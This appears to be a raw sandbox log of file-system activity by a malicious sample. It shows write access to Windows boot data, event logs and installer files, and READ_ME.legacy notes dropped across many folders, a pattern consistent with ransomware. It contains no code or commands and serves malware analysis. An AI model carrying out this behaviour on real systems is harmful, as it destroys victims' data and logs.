Create	\588bce7c90097ed212\Windows6.0-KB956250-v6001-x86.msu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Windows6.0-KB956250-v6001-x64.msu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\watermark.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\UiInfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Strings.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\sqmapi.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\SplashScreen.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\SetupUtility.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\SetupUi.xsd	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\SetupUi.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\SetupEngine.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Setup.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\RGB9Rast_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\RGB9RAST_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\ParameterInfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\netfx_Extended_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\netfx_Extended_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\netfx_Extended.mzz	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\netfx_Core_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\netfx_Core_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\netfx_Core.mzz	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\header.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\DisplayIcon.ico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\DHtmlHeader.html	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\bg-BG\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\cs-CZ\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\da-DK\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\de-DE\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\el-GR\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\en-GB\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\en-US\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\es-ES\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\es-MX\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\et-EE\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\fi-FI\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Fonts\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\fr-CA\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\fr-FR\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\hr-HR\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\hu-HU\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\it-IT\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ja-JP\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ko-KR\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\lt-LT\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\lv-LV\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\nb-NO\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\nl-NL\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\pl-PL\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\pt-BR\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\pt-PT\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\qps-ploc\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\Resources\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ro-RO\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\ru-RU\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sk-SK\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sl-SI\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sr-Latn-CS\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sr-Latn-RS\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\sv-SE\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\tr-TR\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\uk-UA\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\zh-CN\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\zh-HK\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\zh-TW\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\updaterevokesipolicy.p7b	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\memtest.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\bootvhd.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\BOOTSTAT.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\bootspaces.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\BCD.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\BCD.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\BCD.LOG	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\BCD	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Windows PowerShell.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\System.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Setup.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Security.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Winlogon%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-TWinUI%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Store%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-SMBServer%4Security.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-SMBServer%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-SMBServer%4Audit.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-SmbClient%4Security.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-SMBClient%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-SettingSync%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-SettingSync%4Debug.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Ntfs%4WHC.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Ntfs%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-NCSI%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-MUI%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-MUI%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-LiveId%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Known Folders API Service.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-International%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppReadiness%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppReadiness%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppLocker%4MSI and Script.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-AppLocker%4EXE and DLL.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Key Management Service.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Internet Explorer.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\HardwareEvents.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\Application.evtx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Recovery\Logs\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Recovery\ReAgentOld.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\All Users\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Default User\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Default.migrated\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\FD1HVy\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\Public\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\2052\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\dll1\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\dll2\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\resources\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\WinREBootApp64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\WinREBootApp32.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\Windows10UpgraderApp.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\windlp.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\wimgapi.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
